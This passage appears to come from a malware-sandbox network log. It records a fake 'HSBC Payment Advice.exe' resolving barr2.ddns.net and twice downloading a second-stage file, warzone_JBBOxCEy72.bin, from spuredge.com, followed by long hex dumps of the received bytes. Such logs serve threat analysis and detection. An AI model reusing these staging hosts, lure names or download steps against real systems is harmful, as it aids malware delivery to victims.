Nov 25, 2021 18:53:02.752720118 CET | 8.8.8.8 | 192.168.2.7 | 0x13e6 | No error (0) | barr2.ddns.net | - | 194.5.97.4 | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • spuredge.com

                  HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49784 | 38.103.244.107 | 443 | C:\Users\user\Desktop\HSBC Payment Advice.exe
Timestamp | kBytes transferred | Direction | Data
2021-11-25 17:50:48 UTC | 0 | OUT | GET /warzone_JBBOxCEy72.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: spuredge.com
                  Cache-Control: no-cache
2021-11-25 17:50:49 UTC | 0 | IN | HTTP/1.1 200 OK
                  Date: Thu, 25 Nov 2021 17:50:48 GMT
                  Server: Apache
                  Last-Modified: Wed, 24 Nov 2021 19:03:36 GMT
                  Accept-Ranges: bytes
                  Content-Length: 115776
                  Connection: close
                  Content-Type: application/octet-stream
2021-11-25 17:50:49 UTC | 0 | IN | Data Raw: 90 31 03 cf 80 65 33 6d 2e 69 a8 c3 32 17 22 69 13 1a de 7d b9 21 57 15 22 1f c1 fc 9e a6 32 19 7d 1e 80 92 3d 5f 34 88 f4 ac 46 9c 83 cc 5a 2d ab 30 bc 7f fb 4f d1 99 0f 64 1d b8 84 a2 d3 52 10 94 eb f0 ec 4e 74 0f 44 2c 91 51 bf 6b e4 97 11 2f 85 77 8a 53 e3 76 e8 0f 80 f8 99 62 21 6d 0e 5e 96 48 af 42 78 bb 25 a9 0e 8e 36 33 3d d6 06 ac a1 86 0a 87 0b 6e e6 c8 42 d7 bd f1 81 a0 3d 33 a9 ae 55 83 f3 78 7f 29 e8 53 f4 18 2d 7b 39 ba 0f 09 3d 3e 85 96 8a d3 61 8a 14 6e cc 73 53 69 fc 62 e7 a9 39 13 0d 10 63 2d b3 a1 3d a9 65 e7 08 15 d6 be 8f af ab db 10 e0 16 8c f8 f9 cf 68 34 8f a1 5c fd f0 d9 6c f0 3f a7 25 0c 67 f8 f8 d8 a5 c1 71 b6 e2 77 75 c4 fc 31 93 a4 f2 52 b4 90 4c 33 eb 64 36 0e dd 73 42 3a 44 b8 bd 13 a9 63 8c d0 19 0c 7f 7c 96 ca b0 d9 f7 32
                  Data Ascii: 1e3m.i2"i}!W"2}=_4FZ-0OdRNtD,Qk/wSvb!m^HBx%63=nB=3Ux)S-{9=>ansSib9c-=eh4\l?%gqwu1RL3d6sB:Dc|2
2021-11-25 17:50:49 UTC | 8 | IN | Data Raw: 18 24 8d 90 f9 01 a9 0e 03 7b c7 d5 e8 1e ac a1 d9 54 dc c2 ad b3 43 ae 54 51 e4 d2 f6 64 1f ec 2b a7 60 71 6c a1 84 c9 5d 78 39 28 98 9c 4a e9 7d 19 b9 f7 ef eb be a9 07 a6 00 a2 45 a2 89 ea 28 91 56 01 81 c5 7b 06 0d f7 bf e3 cc f4 03 a0 20 10 45 88 a5 8f 56 5d 14 fe fa f6 f9 b5 be 85 a6 77 3e 5c 76 e7 dd 2f 4d 71 56 90 e1 05 20 1d dc eb 59 66 25 40 ba 2a 2b 85 63 60 9c 64 8d 5f ca 58 5a bb 40 ff 47 98 c4 05 28 a1 f0 e2 eb bc 0a ed a8 d3 09 af 9f 43 36 e6 94 fe 4d c5 35 48 d0 16 b9 de 48 e2 93 ce c8 39 2c ee 3d 56 08 8d 63 23 4c e1 86 5f 1f c7 98 1b 97 66 ff 06 91 7f 22 75 cc 53 0f 79 7c ab d2 16 70 50 66 f1 d6 e2 be e0 6d ba fd 03 a6 60 05 8b 94 56 b8 a4 85 ea f6 bd 8d 47 d2 e5 38 12 a2 1b 99 1d 67 d7 77 8f 1a 53 4f a4 2e 7c 31 66 45 a9 43 30 ed 03 2f
                  Data Ascii: ${TCTQd+`ql]x9(J}E(V{ EV]w>\v/MqV Yf%@*+c`d_XZ@G(C6M5HH9,=Vc#L_f"uSy|pPfm`VG8gwSO.|1fEC0/
2021-11-25 17:50:49 UTC | 15 | IN | Data Raw: 99 f2 58 6a 33 8c c4 86 1e 2e 3b 54 90 ca 81 01 a6 72 e1 b8 d3 5f b5 83 27 a0 19 5b 36 e2 2a f2 b9 f3 60 76 80 71 4c c3 a7 37 3d 50 89 e8 1b 3a 5f f9 fa 5c f2 38 ea dd af 66 98 39 6e 80 2a 51 28 cd a6 76 08 ea cf 16 2a 40 72 f1 78 e2 37 be 4c 0d f3 03 f3 14 9e de 4f 4c e7 b5 f0 a0 0a ed 50 81 11 ca 5f 01 ea 5a 14 d3 d4 3b cf 68 10 b5 3b 16 8e 74 b7 16 ab 63 42 3a fc 77 9d 02 f8 ff 5b 01 60 7c 50 72 ed 03 f8 b1 77 50 95 6c f7 6b 28 ee b5 32 d8 64 90 eb 17 e4 46 2e df 8a ae 1e 72 7b 5a 12 6d c1 17 6e 50 10 30 1f cf 5b 88 41 9b c2 2e 83 54 68 61 5c be 4b 5c 74 70 f6 f6 a2 b8 07 85 c2 0f 7f 6f 8c 99 c2 40 87 1e 8b 77 5b a2 fd db 1c 5d 2b 3e a8 7d 0d e0 38 49 26 a0 aa e7 d3 21 91 db 15 9a 25 04 3d d4 01 c9 ce 85 a0 bf 02 8d ef 67 4f 2a 3e c3 b9 7f 3f 2d 57 6c
                  Data Ascii: Xj3.;Tr_'[6*`vqL7=P:_\8f9n*Q(v*@rx7LOLP_Z;h;tcB:w[`|PrwPlk(2dF.r{ZmnP0[A.Tha\K\tpo@w[]+>}8I&!%=gO*>?-Wl
                  2021-11-25 17:50:49 UTC23INData Raw: 25 1f 2e 3f 82 ef 85 4d 4e 65 0f 29 17 6b 2c 82 29 72 57 88 a3 78 5d c9 c0 c1 8a e1 6e d9 dc c7 43 83 1b 01 86 2b 1a 9f f6 a6 20 94 ea 89 6a 19 ac 12 8f 3e d5 d7 c3 a0 9c f1 09 5b 77 c5 85 cb c8 83 aa 93 b0 b4 a7 88 8d 6c db bc 09 66 8e 5b ea 9a 32 08 00 98 f4 c3 ad 39 88 e9 93 28 4a d8 2c 60 e8 93 23 25 b5 4a 40 c9 c9 ca 6d a0 bd f6 4a 5e 62 ea 19 a4 c0 7c 7a 69 eb 57 ec 26 b6 f5 57 a0 3b 91 49 b9 fe 60 54 5d 79 cf 40 ac 19 56 9c f9 68 73 ef 2f d9 1e 90 9b 61 c3 86 a2 e7 1f 9a 5b 22 5a 34 79 45 8d 36 e1 29 df 6b d4 bb 9d 45 c4 b9 d4 96 cf fc 18 09 fa 8e 75 21 d3 f5 dd fe be ba b7 ab fa b8 8d eb 3d c0 03 64 c1 5a 88 51 71 28 e2 96 11 e6 69 1e b3 9b 62 b8 eb 96 1b 7e 6e 68 48 7f 68 47 05 39 81 2b 5b 06 21 1f ab 8a 90 59 b8 93 f4 99 2d 94 22 da 13 a0 72 3b
                  Data Ascii: %.?MNe)k,)rWx]nC+ j>[wlf[29(J,`#%J@mJ^b|ziW&W;I`T]y@Vhs/a["Z4yE6)kEu!=dZQq(ib~nhHhG9+[!Y-"r;
                  2021-11-25 17:50:49 UTC31INData Raw: 6e 33 0b 73 4e e5 ec 06 70 59 32 e9 fd 22 1f 90 fd 97 72 3a 92 80 8b 52 6d 3f ba d7 62 fa bf 38 ea ee 3d e9 e6 1b 98 bd b4 95 4c 4c 75 e0 03 6b dc 58 9a b6 8b 79 df 2b 46 63 8e 2e b5 be 36 36 ad aa 73 af 32 47 9e 91 b6 53 08 08 d8 bb 10 3c 45 8b e1 f3 67 f8 ba 10 40 93 39 ab f7 e0 f7 ff bd 0b b3 06 d3 cf 7c cc 69 84 b6 a5 cb c8 27 ab c3 02 80 de 44 5f 04 e2 04 3e f0 f9 f9 05 83 c9 50 5a cd e7 dd d9 8c a9 ef 08 11 9b d6 10 ec 8e 33 4a 06 4c 82 b9 a2 9a 05 ac c4 82 a0 d4 fe 2f a9 23 9d 9a 2b fd 4b a9 ac 0b bf d3 a6 b1 20 8c ab 4d 22 03 73 64 35 fe 5c 73 03 cb 1f 84 77 cb 4b 61 a9 29 75 36 fc f8 44 10 b5 c2 74 22 83 2f a8 17 89 4b 19 07 8a 21 56 27 95 2f a3 3a cd 8e 65 37 b4 56 2d 6f 0b ae 49 cc 27 7d aa 21 5b 76 7a c4 67 35 61 0b eb b4 ab 4d 56 79 d2 9b 8a
                  Data Ascii: n3sNpY2"r:Rm?b8=LLukXy+Fc.66s2GS<Eg@9|i'D_>PZ3JL/#+K M"sd5\swKa)u6Dt"/K!V'/:e7V-oI'}![vzg5aMVy
                  2021-11-25 17:50:49 UTC39INData Raw: 70 d7 9c d9 05 cc dc 90 e5 e9 3c 3f fc 42 7e 2d e3 ad 98 07 5d 41 c1 25 28 da 03 27 43 38 24 e3 25 37 66 bc df e5 36 4d 60 12 a2 b9 98 cc 72 b5 ca 27 2f 10 02 9b ac cf f8 34 65 14 8e 93 e2 33 ac e9 cb c9 fa 75 44 bb 47 8f 8c 93 03 3e c1 a9 76 d5 f4 59 41 df 4e a2 02 08 de 71 09 26 8d 3c 0f 56 02 6f 73 ca e3 d4 91 01 91 d8 ed 63 f7 80 bc 86 b1 f4 fe 70 60 89 3a 0b 69 40 2b 78 ae b9 14 17 40 d8 a8 06 93 12 a8 af 37 24 e9 37 a2 a1 26 ad b5 49 09 9b 64 df 00 71 64 8e ac 0a 70 b4 db 45 36 02 73 1f 80 7a e3 f6 26 11 29 d9 ea b2 ac f7 dc c2 98 91 64 45 59 a8 a0 3c b1 9e 5c 66 bd f4 2f 41 b1 e6 9d ea 5c 92 71 db b2 c7 fb 94 8b f2 cc 48 d3 4a fa 64 d8 54 6a 9e 1e 92 8b f2 d1 97 7f c8 b1 39 11 d8 d6 31 84 7b 9a ba ff 72 b0 7f c7 06 bf 81 90 d6 e8 2f 00 b7 fe 5c 6e
                  Data Ascii: p<?B~-]A%('C8$%7f6M`r'/4e3uDG>vYANq&<Voscp`:i@+x@7$7&IdqdpE6sz&)dEY<\f/A\qHJdTj91{r/\n
                  2021-11-25 17:50:49 UTC47INData Raw: a9 11 3b ae 10 c1 e1 ee 66 0c 6a 93 d0 1b 55 b0 fc ec 97 e4 29 ad 95 8c f3 bb 01 b4 26 79 cf ec 5e d8 f8 94 65 40 74 e1 6b b4 ad 5d cd 03 fc 7a f9 56 36 1d 0d 37 eb d7 05 36 d2 24 34 f3 4a 2d 4e 00 8a 7b 6d 9e d6 89 4b 55 00 46 e7 ea 57 51 59 c0 61 fb e6 06 b5 54 c3 a2 c5 1a da 79 8f 51 43 a9 3d fa f9 46 de 0a 6f 7d a2 f2 24 e7 6c 40 6e ae 10 19 a9 83 41 a6 ec 88 75 d8 ae ca 40 0e 17 07 66 ef 6c 7d e6 be fe b7 50 c7 b8 c4 35 24 43 9a de e7 55 29 f9 29 61 89 84 35 0b 6e e6 fb 99 5a f0 f8 08 fd 9f a5 4e 10 dc 6a 4e 5d e7 f9 16 e0 bc f9 07 33 dd 8c cf 29 c2 1c ea 0c 51 d6 be 16 25 8d ef b0 cf 02 f2 f8 38 50 01 9d c5 c8 9b f2 08 67 33 69 85 c5 7c 98 75 db 7d 5a 0a 1b 6e c0 9b c9 24 a9 38 78 d8 b2 11 08 90 89 b7 dd 2f 09 71 06 f2 1e fa 40 58 ff 16 c8 b2 9b bf
                  Data Ascii: ;fjU)&y^e@tk]zV676$4J-N{mKUFWQYaTyQC=Fo}$l@nAu@fl}P5$CU))a5nZNjN]3)Q%8Pg3i|u}Zn$8x/q@X
                  2021-11-25 17:50:49 UTC55INData Raw: d8 23 21 e6 c8 b7 07 48 af 42 10 c7 c5 fd 0e e6 6a 54 7c d6 8b e1 a9 6e 62 c8 f4 91 6d bd 4e 5c 73 a0 69 73 1c 2c 13 2b 18 3f 12 a0 26 6e 16 4c 51 51 1e 52 50 44 62 75 a7 16 ad 1b 14 ee ca 27 9d b5 8d 1c 27 c2 d3 0b 2f 2c 3b 82 d2 c6 2d ed a3 ee d7 b1 e8 dc 6c 27 90 54 60 e5 8f 33 98 d8 e9 73 af 06 a0 b5 89 1b 9f 53 af 36 0c 7d 0a 39 79 4d 9e 89 79 2b 41 23 94 4f a9 29 a0 d9 7c 1e f1 50 66 ff 60 6f 1f a2 f0 28 7b fd f7 cf f7 a0 fa 87 7c c4 1f d3 de 4b ed 16 5e a6 19 fd 9e f4 ea cb f5 9d e0 a7 4c 08 ac 6d 5a 44 51 91 99 bc d6 23 76 2d dd ae 05 4b 24 4d c9 9b 68 6f 27 41 56 54 78 f0 e8 f9 9f f5 99 aa c6 13 86 e6 62 ba 1e 96 b7 10 3b cf 89 26 b6 8a de f2 53 46 cb 72 06 2c 7b 8c 18 7d 6c c3 d1 3d 98 19 e5 59 49 5d e4 91 90 c7 2f 46 b8 97 1b c0 da 1e 72 01 b9
                  Data Ascii: #!HBjT|nbmN\sis,+?&nLQQRPDbu''/,;-l'T`3sS6}9yMy+A#O)|Pf`o({|K^LmZDQ#v-K$Mho'AVTxb;&SFr,{}l=YI]/Fr
                  2021-11-25 17:50:49 UTC62INData Raw: d6 64 26 ca a3 a0 0d 5a 8f b2 ae 27 8c c5 05 8f c3 b0 fa d8 55 05 52 22 07 f6 e3 64 47 f7 06 db a3 e6 87 b3 e1 48 30 35 85 64 28 c6 69 fb c3 27 37 6c ce 0e 03 61 27 91 5c ea 46 52 d7 16 a6 e4 5f 79 da 3d b1 b1 58 39 ce 49 79 74 b6 82 f1 6e 79 89 85 48 0f fb 85 db e4 21 88 d3 6b f9 f2 15 71 6e 14 7e 2d 73 6f d2 49 a5 f3 a7 ce 29 da 4b 0e e8 f6 0c b3 da b8 33 8d 7f c9 f8 12 43 3b cf 64 33 fc d0 fe 46 a9 c4 79 6c 74 da 6e e5 53 1b bf 14 eb ae 84 53 e0 ef b1 6e 3b 6e 67 1b 88 a7 ff b0 2c f4 c1 b0 44 be a7 dc fd f3 31 12 6e f4 42 e4 f1 d2 b3 b3 cc d6 2a 6c 06 c8 1b 6e eb ee 40 f4 7d 81 1e ab 28 7c 29 7b 28 6c 22 8b f8 32 81 f0 ea 44 14 cf 9f 67 c4 40 b6 ba bd cd d2 09 3c ee 7a cf ea dc e4 e1 66 6d e2 30 e4 76 ca 6e b6 91 6f 7b 5e f4 0d f5 88 84 5c bb c6 a2 63
                  Data Ascii: d&Z'UR"dGH05d(i'7la'\FR_y=X9IytnyH!kqn~-soI)K3C;d3FyltnSSn;ng,D1nB*ln@}(|){(l"2Dg@<zfm0vno{^\c
                  2021-11-25 17:50:49 UTC70INData Raw: ac 93 bf 10 a1 c4 c7 3e 3e de 2c e5 95 a7 82 60 9c f8 2c 83 ef 10 c7 af 04 0f 38 d3 ff 9c 81 bb 82 4e 7f ab 91 33 10 1f 24 6c c0 cc e4 49 eb e3 72 aa 25 e5 93 88 e9 83 c4 e4 b9 65 5c 8d 84 0d f3 84 1e fe c5 ab 92 1e 62 57 2a c2 73 99 3c 84 87 5c 8a 76 5b ac 74 3f 71 f1 b4 dc 3d e6 20 98 b4 ca 22 5f 18 ea 03 dd 3a 25 29 4c 6a e4 33 51 7d 47 37 83 6b 7e 45 67 dd a4 4b 3a e8 4c b5 f6 62 95 7b b2 2c 7b 3e 66 eb bc 65 4a 26 46 c9 ad 3f 6f 94 2e fd 20 90 31 4b ee e2 ed 69 3e 6a 03 1e a9 ff c0 29 ad dd 12 25 19 08 2a 32 94 7f 12 ca 88 8a 1d 17 85 22 bb c4 b1 00 7d 54 cf 5d f9 f0 1c dc 49 e6 87 65 f9 56 04 80 13 41 7f 5f 15 3d c2 5e 2b 38 9d 48 36 73 28 12 f4 5c 26 57 4b 9c 5d 9f 31 78 c8 85 5f 8b 22 a4 41 f5 41 d1 22 72 e8 cf fc a6 d7 98 9a cb 86 ab 28 f2 9d c1
                  Data Ascii: >>,`,8N3$lIr%e\bW*s<\v[t?q= "_:%)Lj3Q}G7k~EgK:Lb{,{>feJ&F?o. 1Ki>j)%*2"}T]IeVA_=^+8H6s(\&WK]1x_"AA"r(
                  2021-11-25 17:50:49 UTC78INData Raw: 26 9c df 06 0a a1 67 e4 0d 1d d7 87 c2 e5 38 80 fe f4 02 9e ef 1b 0c 17 7a 66 aa 22 23 db 32 eb 0d 2b a4 ad 62 4d 79 60 8d 79 dd 9e 54 14 0e 35 6f 31 bf 69 bf 73 07 76 22 2f 7e d2 2a 84 0d d0 e8 ff 43 f0 bf 6a 63 27 54 1b eb 37 b0 16 e1 c1 84 d1 6d 37 c2 41 e9 d6 4e a5 c7 7d b7 9a c7 44 ee 0c 61 5c a1 76 11 c5 26 be 66 0a 38 f4 61 39 6c a5 21 fd 85 1f 51 e3 e2 7f d5 e4 82 6b c6 cb 30 3b 9e 6b eb 39 da aa 41 cc 4f 92 01 71 46 38 58 a0 2d e0 d5 7d de 9e b8 0b 2c 5b 20 5f 35 0a dd a5 e7 fa cf 6e 7f 1c 57 c9 ae 70 04 09 70 eb 25 30 f2 d0 9f 1a 50 91 84 22 f0 ee 59 75 36 94 12 84 20 a9 76 d1 cf b4 12 e9 a5 7b 80 ff 10 6a d9 54 06 ff c7 f2 a2 bb 82 89 b0 46 b9 95 b3 e5 41 d7 bb d5 ac 95 df c8 da b9 69 b2 3c c3 cd 96 d8 3b 73 9e b5 03 2b 50 55 15 b6 72 ae 65 d6
                  Data Ascii: &g8zf"#2+bMy`yT5o1isv"/~*Cjc'T7m7AN}Da\v&f8a9l!Qk0;k9AOqF8X-},[ _5nWpp%0P"Yu6 v{jTFAi<;s+PUre
                  2021-11-25 17:50:49 UTC86INData Raw: f9 b4 c9 d9 86 12 23 04 4f a8 63 36 03 05 57 59 de d3 11 bf 75 03 8c 18 ff 3b b9 8d 89 36 dd 25 c7 a5 0d 72 56 e0 66 c9 ef 2e ce 07 68 06 a2 56 5f 62 81 85 6e 71 50 8e cd e5 aa b8 de e9 96 ba 71 20 c6 c3 bb a3 61 53 27 71 72 32 25 16 db 2b 78 64 b6 e0 36 74 97 43 e4 59 e3 05 98 56 ef c2 31 07 ca 09 db ab 9d 38 10 47 5e f8 b7 46 98 9d ce 8b 8b a0 b9 37 05 73 50 1e bb 50 8c 27 3c 97 8a a6 f2 9f fb 1c 5a 12 38 70 dc ed 61 a2 2b 5c 46 08 f4 59 3a aa ae 1e ff 7c 41 bc 5c d3 7f ba fb 49 8b 4f 7d 65 2a 2c 85 3b 5a 28 d9 c5 aa 43 60 ab e5 1d b4 78 3d c8 b3 f1 03 10 e0 91 e7 51 e6 7e e7 28 74 19 3c 50 14 31 cc f0 44 a0 27 e7 28 64 20 7a 45 a9 36 7f 0b 70 f5 e9 40 e2 b0 d7 11 2f 30 c5 b7 8c 44 92 99 cd 41 a5 d2 bc fc 6e 77 6e 3e ec f3 32 0f f9 39 2b 61 a5 2e f4 62
                  Data Ascii: #Oc6WYu;6%rVf.hV_bnqPq aS'qr2%+xd6tCYV18G^F7sPP'<Z8pa+\FY:|A\IO}e*,;Z(C`x=Q~(t<P1D'(d zE6p@/0DAnwn>29+a.b
                  2021-11-25 17:50:49 UTC94INData Raw: dc cb cb a9 51 75 3b 28 fa 24 25 b8 91 dd a7 e1 8d e6 9f 40 82 8c 98 4b 6b 8c 01 b5 37 ff 8e e3 ca a3 22 02 4d e3 d4 b2 b0 8a 8f 0b 75 9a d8 ab 5c ad 33 75 99 d8 a4 cd 35 aa b5 09 8c 7d 2e 2d 95 4e 0e d1 75 e2 ae f6 0f 39 61 02 0a f1 08 52 39 8a 41 70 70 01 0d 9c c1 d9 eb 66 da 04 c5 f1 99 31 ad 8e 9b 2e bf e8 35 83 8f 80 11 5d ce ee f3 bf 3c 1b 6c 25 5f e2 62 72 d2 8d e5 da 5b 85 77 1d 50 b3 04 c7 6c e5 8b ea 51 13 23 6b 26 e2 48 bd 47 2f d2 4b ec 76 eb 55 33 b9 d4 41 c9 d5 d2 6f ea 7b 3e 87 bc 2a 96 bd f0 ca e5 61 62 56 ec 66 05 d4 d1 32 fd e9 1f 0a 3a 0e 60 20 bb 46 17 3b 37 b5 e4 d9 bd 36 9a 05 72 cb 72 53 2f df 07 64 da 0b 18 59 2e 64 63 93 81 19 dd 6d f0 18 27 f8 b3 af a4 c8 be 64 a6 79 fe 9d 9e c7 5a bd 34 fb 37 06 18 83 3f 15 b9 dc 18 d9 84 71 87
                  Data Ascii: Qu;($%@Kk7"Mu\3u5}.-Nu9aR9Appf1.5]<l%_br[wPlQ#k&HG/KvU3Ao{>*abVf2:` F;76rrS/dY.dcm'dyZ47?q
                  2021-11-25 17:50:49 UTC101INData Raw: 10 b7 3a a8 1f 80 f8 23 64 21 6d 20 2a f3 30 db 66 15 d5 25 a9 0e 8e 36 13 3d d6 82 ac a1 86 24 ee 6f 0f 92 a9 66 e2 bd f0 81 a0 b7 0c 13 a0 59 37 fa b5 70 a1 d9 7c 5f 5e 79 13 c0 e9 2f 79 af 55 e2 e4 c5 cc 25 88 01 61 a2 1c 57 6c 9e 07 3b db 4c 7d 03 0b 69 6c 83 8f 4a f3 72 f2 08 12 9f b3 82 a5 e3 fd 10 e0 46 8c f8 f9 9b 5c ac 3b eb 01 4b 44 e7 50 62 b9 25 3f 9e e1 11 cb 15 23 d0 24 40 05 34 50 f6 49 0e af 36 74 7f a1 5f ca 8b d7 f6 b0 39 4e e8 a5 71 19 0e 0f 0a 53 9f 0a b9 02 9e f9 07 a4 57 36 c8 a2 c4 77 78 97 39 6d fa 3a 32 64 b1 f5 99 43 cb a7 37 6c f3 a0 61 60 4a 1a 09 12 5d 2f c7 15 26 68 8e 79 fb f3 0c d2 99 c0 de 4a 89 b7 67 82 8e c2 b7 99 20 f5 1a 00 d5 a1 ff c6 03 a6 9f 72 ff 59 1b 6c 4c 6f e5 f6 93 af bf 6b 6e 7c 01 90 1b 14 50 b3 ef e9 80 1a
                  Data Ascii: :#d!m *0f%6=$ofY7p|_^y/yU%aWl;L}ilJrF\;KDPb%?#$@4PI6t_9NqSW6wx9m:2dC7la`J]/&hyJg rYlLokn|P
                  2021-11-25 17:50:49 UTC109INData Raw: 59 56 0c 10 45 c6 90 ec 4b 4f b8 ae f5 0f d7 f6 30 17 27 c8 c5 05 78 9b 09 ac 60 93 3f 9f 10 e3 cc d5 93 f4 03 4f fe b8 20 12 c0 38 6d d1 0c 0f 52 fa f3 c6 75 b3 91 4f 5a 34 f2 f2 22 33 2d 20 25 7a 28 51 22 c9 50 3d 4e 17 a6 b7 96 db f8 96 72 e4 cf e3 ba 68 fa 2c a1 af bf c0 4a 01 bd 2b cf e8 9e 67 4a 8b 20 0e 55 62 44 d1 cf 83 e4 87 20 6e 61 41 9b 6c 2d 2e 8a b7 f6 18 23 f0 fd fa e4 d2 c2 22 79 c2 91 81 39 b2 ea a6 2a 9c 75 6d 5a 81 27 fa 54 ee ca 29 a5 3a bc af cd 01 d5 59 d1 c5 21 24 ab ec a7 7c fe bc fc 89 d4 ab 46 97 a1 28 23 06 7c 3c 23 e2 88 7a 1f 51 e5 d8 ea 4e d5 a8 80 03 5d de 82 ef 71 81 bc ab 97 86 7b 35 32 d8 db b6 bf 95 5a a2 b4 9f aa 44 b5 8d 12 9e 0e cc 0c fd fc 15 cb 07 d5 a5 b6 7b 9d 0b db 80 54 a0 e6 ab f2 2c d5 31 ac b1 7d 4a bc e1 43
                  Data Ascii: YVEKO0'x`?O 8mRuOZ4"3- %z(Q"P=Nrh,J+gJ UbD naAl-.#"y9*umZ'T):Y!$|F(#|<#zQN]q{52ZD{T,1}JC


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.7 | 49823 | 38.103.244.107 | 443 | C:\Users\user\Desktop\HSBC Payment Advice.exe
                  Timestamp | kBytes transferred | Direction | Data
                  2021-11-25 17:53:00 UTC | 113 | OUT | GET /warzone_JBBOxCEy72.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: spuredge.com
                  Cache-Control: no-cache
                  2021-11-25 17:53:00 UTC | 113 | IN | HTTP/1.1 200 OK
                  Date: Thu, 25 Nov 2021 17:53:00 GMT
                  Server: Apache
                  Last-Modified: Wed, 24 Nov 2021 19:03:36 GMT
                  Accept-Ranges: bytes
                  Content-Length: 115776
                  Connection: close
                  Content-Type: application/octet-stream
                  2021-11-25 17:53:00 UTC113INData Raw: 90 31 03 cf 80 65 33 6d 2e 69 a8 c3 32 17 22 69 13 1a de 7d b9 21 57 15 22 1f c1 fc 9e a6 32 19 7d 1e 80 92 3d 5f 34 88 f4 ac 46 9c 83 cc 5a 2d ab 30 bc 7f fb 4f d1 99 0f 64 1d b8 84 a2 d3 52 10 94 eb f0 ec 4e 74 0f 44 2c 91 51 bf 6b e4 97 11 2f 85 77 8a 53 e3 76 e8 0f 80 f8 99 62 21 6d 0e 5e 96 48 af 42 78 bb 25 a9 0e 8e 36 33 3d d6 06 ac a1 86 0a 87 0b 6e e6 c8 42 d7 bd f1 81 a0 3d 33 a9 ae 55 83 f3 78 7f 29 e8 53 f4 18 2d 7b 39 ba 0f 09 3d 3e 85 96 8a d3 61 8a 14 6e cc 73 53 69 fc 62 e7 a9 39 13 0d 10 63 2d b3 a1 3d a9 65 e7 08 15 d6 be 8f af ab db 10 e0 16 8c f8 f9 cf 68 34 8f a1 5c fd f0 d9 6c f0 3f a7 25 0c 67 f8 f8 d8 a5 c1 71 b6 e2 77 75 c4 fc 31 93 a4 f2 52 b4 90 4c 33 eb 64 36 0e dd 73 42 3a 44 b8 bd 13 a9 63 8c d0 19 0c 7f 7c 96 ca b0 d9 f7 32
                  Data Ascii: 1e3m.i2"i}!W"2}=_4FZ-0OdRNtD,Qk/wSvb!m^HBx%63=nB=3Ux)S-{9=>ansSib9c-=eh4\l?%gqwu1RL3d6sB:Dc|2
                  2021-11-25 17:53:00 UTC121INData Raw: 18 24 8d 90 f9 01 a9 0e 03 7b c7 d5 e8 1e ac a1 d9 54 dc c2 ad b3 43 ae 54 51 e4 d2 f6 64 1f ec 2b a7 60 71 6c a1 84 c9 5d 78 39 28 98 9c 4a e9 7d 19 b9 f7 ef eb be a9 07 a6 00 a2 45 a2 89 ea 28 91 56 01 81 c5 7b 06 0d f7 bf e3 cc f4 03 a0 20 10 45 88 a5 8f 56 5d 14 fe fa f6 f9 b5 be 85 a6 77 3e 5c 76 e7 dd 2f 4d 71 56 90 e1 05 20 1d dc eb 59 66 25 40 ba 2a 2b 85 63 60 9c 64 8d 5f ca 58 5a bb 40 ff 47 98 c4 05 28 a1 f0 e2 eb bc 0a ed a8 d3 09 af 9f 43 36 e6 94 fe 4d c5 35 48 d0 16 b9 de 48 e2 93 ce c8 39 2c ee 3d 56 08 8d 63 23 4c e1 86 5f 1f c7 98 1b 97 66 ff 06 91 7f 22 75 cc 53 0f 79 7c ab d2 16 70 50 66 f1 d6 e2 be e0 6d ba fd 03 a6 60 05 8b 94 56 b8 a4 85 ea f6 bd 8d 47 d2 e5 38 12 a2 1b 99 1d 67 d7 77 8f 1a 53 4f a4 2e 7c 31 66 45 a9 43 30 ed 03 2f
                  Data Ascii: ${TCTQd+`ql]x9(J}E(V{ EV]w>\v/MqV Yf%@*+c`d_XZ@G(C6M5HH9,=Vc#L_f"uSy|pPfm`VG8gwSO.|1fEC0/
                  2021-11-25 17:53:00 UTC129INData Raw: 99 f2 58 6a 33 8c c4 86 1e 2e 3b 54 90 ca 81 01 a6 72 e1 b8 d3 5f b5 83 27 a0 19 5b 36 e2 2a f2 b9 f3 60 76 80 71 4c c3 a7 37 3d 50 89 e8 1b 3a 5f f9 fa 5c f2 38 ea dd af 66 98 39 6e 80 2a 51 28 cd a6 76 08 ea cf 16 2a 40 72 f1 78 e2 37 be 4c 0d f3 03 f3 14 9e de 4f 4c e7 b5 f0 a0 0a ed 50 81 11 ca 5f 01 ea 5a 14 d3 d4 3b cf 68 10 b5 3b 16 8e 74 b7 16 ab 63 42 3a fc 77 9d 02 f8 ff 5b 01 60 7c 50 72 ed 03 f8 b1 77 50 95 6c f7 6b 28 ee b5 32 d8 64 90 eb 17 e4 46 2e df 8a ae 1e 72 7b 5a 12 6d c1 17 6e 50 10 30 1f cf 5b 88 41 9b c2 2e 83 54 68 61 5c be 4b 5c 74 70 f6 f6 a2 b8 07 85 c2 0f 7f 6f 8c 99 c2 40 87 1e 8b 77 5b a2 fd db 1c 5d 2b 3e a8 7d 0d e0 38 49 26 a0 aa e7 d3 21 91 db 15 9a 25 04 3d d4 01 c9 ce 85 a0 bf 02 8d ef 67 4f 2a 3e c3 b9 7f 3f 2d 57 6c
                  Data Ascii: Xj3.;Tr_'[6*`vqL7=P:_\8f9n*Q(v*@rx7LOLP_Z;h;tcB:w[`|PrwPlk(2dF.r{ZmnP0[A.Tha\K\tpo@w[]+>}8I&!%=gO*>?-Wl
